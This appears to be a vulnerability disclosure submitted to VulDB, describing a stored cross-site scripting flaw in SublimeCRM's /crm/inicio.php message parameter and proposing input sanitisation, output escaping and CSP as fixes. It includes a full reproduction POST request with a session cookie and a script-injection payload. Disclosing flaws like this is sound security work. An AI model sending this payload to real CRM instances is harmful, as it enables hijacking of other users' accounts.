| 标题 | Internet Web Solutions Sublime CRM N/A Cross Site Scripting |
|---|
| 描述 | Vulnerability description:
**SublimeCRM**, a **Customer Relationship Management (CRM) platform**, contains a **Stored Cross-Site Scripting (XSS) vulnerability** in the `/crm/inicio.php` endpoint.
The **vulnerable parameter is `message`**, which is used when a user **posts a new message on the public board**. The CRM does not properly sanitize user input, allowing authenticated attackers to inject **persistent** JavaScript payloads.
Once the malicious XSS payload is stored in a new message, **it will automatically execute for any user as soon as they log into their account**, leading to **account compromise or unauthorized actions**.
Steps to reproduce:
1. **Log in** to the SublimeCRM platform at `https://www.sublimecrm.com/crm/inicio.php`.
2. Send the following **malicious POST request** to create a new message:
```
POST /crm/inicio.php HTTP/2
Host: www.sublimecrm.com
Cookie: crm_iws=qp9ptvgov90d2s5q6dkn43phq7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Origin: https://www.sublimecrm.com
Referer: https://www.sublimecrm.com/crm/inicio.php
pagina=1&orderby=time&orderby_dir=DESC&unique_edit_id=140&id=(Nuevo)&deleted=&msg_from=8&msg_to=0&message="><script>alert(1)</script>&time=&cliente_crm=1&details=0&edit=0&submit_element=1&delete_element=0
```
3. Submit the request.
4. Any **user who logs into the CRM will immediately trigger the stored JavaScript code**, executing it without any additional interaction.
Proposed solution:
- **Sanitize input**: Properly encode user input in the `message` parameter before storing it.
- **Escape output**: Ensure stored content is encoded properly before being rendered in the CRM interface.
- **Use Content Security Policy (CSP)**: Implement a **strict CSP** to block unauthorized script execution.
References: https://owasp.org/www-community/attacks/xss/ |
|---|
| 用户 | 6h4ack (UID 81245) |
|---|
| 提交 | 2025-02-07 08時57分 (1 年前) |
|---|
| 管理 | 2025-02-15 16時44分 (8 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 295968 [Internet Web Solutions Sublime CRM 直到 20250207 HTTP POST Request /crm/inicio.php msg_to 跨网站脚本] |
|---|
| 积分 | 17 |
|---|